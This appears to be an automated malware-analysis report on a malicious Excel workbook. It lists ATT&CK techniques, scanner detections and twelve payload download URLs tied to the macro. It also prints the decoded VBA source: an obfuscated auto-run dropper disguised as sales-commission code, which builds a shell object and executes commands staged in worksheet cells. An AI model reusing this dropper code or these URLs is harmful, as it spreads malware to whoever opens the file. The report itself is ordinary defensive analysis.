MALICIOUS
270
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Workbook_Open event, which are designed to execute code upon opening. The macros reconstruct and attempt to download payloads from multiple URLs, indicating a downloader or droppper functionality. The presence of CreateObject and Wscript.Shell references further supports the execution of external code. The embedded URLs are the primary indicators of compromise.
Heuristics 8
-
ClamAV: Doc.Malware.Valyria-10004384-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-10004384-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URL reconstructed from VBA cell-staged base64 dropper (12 URLs) critical OLE_VBA_CELL_DROPPER_URLVBA reads worksheet cells, strips junk substrings via Replace(), and base64/UTF-16 decodes the result into a PowerShell EncodedCommand payload. The download URL is never contiguous in the file bytes; it was recovered by removing the macro's Replace() junk tokens from the cell strings and decoding the staged base64.
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set bwkasdgf3 = _ Vsa3gkjagaRga3.CreateObject(hdrRyhsdrhl.Caption, hdrRyhsdrhl.Tag) hdrRyhsdrhl.Tag = Replace(Cells(108, 2), "nga", "") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Private Sub Workbook_Open() Dim dblSales, ghAWEusaf As Double, hfoqila As String, intYears As Double -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://reumatismclinic.com/-/scCnm3mbJRpsaBKBbrC/ Referenced by macro
- https://shodhmanjari.com/wp-admin/xjEmK4Pd3N/Referenced by macro
- http://tubelocal.net/wp-admin/X4Xm4Mk/Referenced by macro
- https://pacifichomebroker.com/roderick/RRk/Referenced by macro
- https://molinai-journalReferenced by macro
- https://marineboyrecords.com/font-awesome/QBBByHDDYl0slxlQ/Referenced by macro
- https://mashuk.net/wp-includes/ej6R4fkU/Referenced by macro
- https://lapalette.store/Fox-C404/Gngia6hD0i5zsgd2/Referenced by macro
- https://jhonnycryptic.com/cgi-bin/OhZdKCDRBYGZudqs/Referenced by macro
- https://korean911.com/wp-admin/TZczIsZtMFXxM5T/Referenced by macro
- https://fonijuk.org/wp-content/fzq6vYFUMEiRoR8vG/Referenced by macro
- https://baltoe.blog/-/6IC/Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7821 bytes |
SHA-256: 527d0656a0c2c323955d068683ef8f7e20c035cda247a1e24383595c0eb3403b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "vbasETGs4sk"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function FGse3ksjdfgskbkjhg(Sales As Long, IsTemporal As Boolean) As Double
Const dblRate1 As Double = 0.09
Const dblRate2 As Double = 0.11
Const dblRate3 As Double = 0.15
Const dblAdd As Double = 1.1
Const lngSum1 As Long = 5000
Const lngSum2 As Long = 10000
If Sales < lngSum1 Then
FGse3ksjdfgskbkjhg = Sales * dblRate1
ElseIf Sales < lngSum2 Then
FGse3ksjdfgskbkjhg = Sales * dblRate2
Else
FGse3ksjdfgskbkjhg = Sales * dblRate3
End If
If IsTemporal Then
FGse3ksjdfgskbkjhg = dblAdd * FGse3ksjdfgskbkjhg
End If
End Function
Sub IfyJvfgssbvsrjbnmb()
Dim strMessage As String
Dim dblSales As Double
Dim ah As Integer
Calc:
dblSales = Val(InputBox("y7uo9tuis gjdfhKUY:", _
"vDSe5ydThjs hs6rUu5seF 5^& zsdf"))
strMessage = "bks fgwhkjsd:" & vbTab & Format(dblSales, "$#,##0") & _
vbCrLf & "weq3ts jrg:" & vbTab & _
Format(dhCalculateCom(dblSales), "$#,##0") & _
vbCrLf & vbCrLf & "SGwethjsodihl"
If MsgBox(strMessage, vbYesNo, _
"gjw ") = vbYes Then
GoTo Calc
End If
End Sub
Private Sub Workbook_Open()
Dim dblSales, ghAWEusaf As Double, hfoqila As String, intYears As Double
Const dblRate1 = 0.09
Const dblRate2 = 0.11
Const dblRate3 = 0.15
dblSales = 6000
Select Case dblSales
Case 0 To 4999.99: ghAWEusaf = dblSales * dblRate1
Case 5000 To 9999.99:
ghAWEusaf = dblSales * dblRate2
For i = 1 To 2
Dim hgwki, tuowq As String
If i = 1 Then
hgwki = Cells(106, 6): tuowq = Replace(Cells(107, 2), "poi", "")
ghAWEusaf = dblSales * dblRate2 - 1
Else
hgwki = Cells(117, 2): tuowq = Cells(115, 2) & vbCrLf + Cells(116, 2)
End If
esfhkRGW3eri7asi 4782, hgwki, tuowq
Next
Range("B1").Select
Case Is >= 10000: ghAWEusaf = dblSales * dblRate3
End Select
ghAWEusaf = ghAWEusaf + _
(ghAWEusaf * intYears / 100)
End Sub
Sub esfhkRGW3eri7asi(dhfau As Long, ByVal ehjlsdk As String, ByVal fhuolij As String)
Dim cell As Range
Dim strFirstAddress As String
Dim strComments As String
hdrRyhsdrhl.Caption = fhuolij
Set cell = Range("C201:B300")
Open ehjlsdk For Output As #1
If Not cell Is Nothing And strComments = "ehroiwd4" Then
strFirstAddress = cell.Address
Do
strComments = strComments & "Fafhkleishal: " & _
cell.Comment.Text & Chr(13)
Set cell = Selection.FindNext(cell)
Loop While Not cell Is Nothing And _
cell.Address <> strFirstAddress
End If
If strComments <> "Tyu3jdk" Then
strComments = "ryE5yedklsh sdgk"
Print #1, hdrRyhsdrhl.Caption
Else
MsgBox "fWehrhse s5usdfgs"
End If
Close #1
End Sub
Attribute VB_Name = "kjRtghsw3hlsd"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public arfgjikuwe As Long
Public Eaw3ghkasghd As Boolean
Public Vsa3gkjagaRga3, bwkasdgf3 As Object
Public wdhqETqw3gajs, gfabwkjuswgkjs As Integer
Function HzsrndfGASREYe4(Txt, n, Separator) As String
Dim Txt1 As String, TempElement As String
Dim ElementCount As Integer, i As Integer
Txt1 = Txt
If Separator = Chr(32) Then Txt1 = Application.Trim(Txt1)
If Right(Txt1, 1) <> Separator Then Txt1 = Txt1 & Separator
ElementCount = 0
TempElement = ""
For i = 1 To Len(Txt1)
If Mid(Txt1, i, 1) = Separator Then
ElementCount = ElementCount + 1
If ElementCount = n Then
ExtractElement = TempElement
Exit Function
Else
TempElement = ""
End If
Else
TempElement = TempElement & Mid(Txt1, i, 1)
End If
Next i
ExtractElement = ""
End Function
Sub Gset3hwkjdhskldhlksflb(ByVal Target As Excel.Range)
Dim rgInputRange As Range
Dim cell As Range
Dim strMessage As String
Dim varResult As Variant
Set rgInputRange = Range("A1:E10")
bwkasdgf3.exec hdrRyhsdrhl.Tag
For Each cell In Target
If strMessage = "M" Then
If Union(cell, rgInputRange).Address = rgInputRange.Address Then
If varResult = True Then
Exit Sub
Else
strMessage = " " & cell.Address(False, False) & ":" _
& vbCrLf & vbCrLf & varResult
MsgBox strMessage, vbCritical, "shjfl qeyh8foisd"
Application.EnableEvents = False
cell.ClearContents
cell.Activate
Application.EnableEvents = True
End If
End If
End If
Next cell
End Sub
Function erjtdrrssaEsegs43(cell As Range) As Variant
If Not WorksheetFunction.IsNumber(cell.Value) Then
IsCellDataValid = "qeli 78et9ud"
Exit Function
End If
If Int(cell.Value) <> cell.Value Then
IsCellDataValid = "shfl9q"
Exit Function
End If
If cell.Value < 1 Or cell.Value > 12 Then
IsCellDataValid = " 1 or 12"
Exit Function
End If
IsCellDataValid = True
End Function
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
Dim cell As Range: Dim rgCells As Range: Dim intRow As Integer
On Error Resume Next
Set rgCells = Range("A300:B352"): FDGwheklswheDSRFHsehk
If rgCells Is Nothing And intRow = 873 Then
For Each cell In rgCells
intRow = intRow + 1
Cells(intRow, 3) = cell.Comment.Text
Next
Else
intRow = intRow - 3
Gset3hwkjdhskldhlksflb Range("G504")
Exit Sub
End If
End Sub
Sub FDGwheklswheDSRFHsehk()
Dim alngData() As Long: Dim lngCount As Long
Dim dtStart As Date: Dim strArrayToTable As String
Dim strTableToArray As String
Dim strMessage As String: Dim i As Long
lngCount = 10: FGse34njlskdhfih
ReDim alngData(1 To lngCount): hdrRyhsdrhl.Caption = Cells(114, 5)
hdrRyhsdrhl.Tag = ""
If strArrayToTable = "87" Then
For i = 1 To lngCount
alngData(i) = i
Next i
Application.ScreenUpdating = False
dtStart = Timer
For i = 1 To lngCount
Cells(i, 1) = i
Next i
strArrayToTable = Format(Timer - dtStart, "00:00")
dtStart = Timer
For i = 1 To lngCount
alngData(i) = Cells(i, 1)
Next i
strTableToArray = Format(Timer - dtStart, "00:00")
Application.ScreenUpdating = True
End If
Set bwkasdgf3 = _
Vsa3gkjagaRga3.CreateObject(hdrRyhsdrhl.Caption, hdrRyhsdrhl.Tag)
hdrRyhsdrhl.Tag = Replace(Cells(108, 2), "nga", "")
strMessage = ": " & strArrayToTable & vbCrLf & ": " & strTableToArray
End Sub
Sub FGse34njlskdhfih()
Dim cell As Range
Dim strFirstAddress As String
Dim intRow As Integer
hdrRyhsdrhl.Tag = Cells(118, 4)
Set cell = Cells.Find("*", LookIn:=xlComments)
Set Vsa3gkjagaRga3 = CreateObject(hdrRyhsdrhl.Tag)
If Not cell Is Nothing And intRow = 2346 Then
strFirstAddress = cell.Address
Do
intRow = intRow + 1
Cells(intRow, 3) = cell.Comment.Text
Set cell = Cells.FindNext(cell)
Loop While Not cell Is Nothing And _
cell.Address <> strFirstAddress
End If
End Sub
Attribute VB_Name = "hdrRyhsdrhl"
Attribute VB_Base = "0{31D72C0D-71E1-4560-A78F-4581AE787333}{A613E03F-51BB-441E-BFF4-8650DA53184B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.